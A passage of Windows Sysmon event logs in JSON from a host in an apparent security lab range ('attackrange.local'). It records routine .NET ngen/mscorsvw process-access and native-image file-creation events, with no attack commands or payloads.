05:59:40.981","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-00101DB81000}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-00101DB81000}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-00101DB81000}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:40.981\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-00101DB81000}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:40.981","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-00101DB81000}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:41.121\r\nProcessGuid: {A837DB8D-04CC-5F25-0000-00101DB81000}\r\nProcessId: 4976\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1370-0\\System.IO.Compression.dll\r\nCreationUtcTime: 2020-08-01 05:59:41.121","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:41.121","ProcessGuid":"{A837DB8D-04CC-5F25-0000-00101DB81000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1370-0\\System.IO.Compression.dll","CreationUtcTime":"2020-08-01 05:59:41.121","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.153\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00105CBB1000}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.153","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00105CBB1000}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.153\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00105CBB1000}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.153","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00105CBB1000}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00105CBB1000}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00105CBB1000}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.200\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.200","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.200\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:41.200","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-00108BBE1000}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:41.200\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 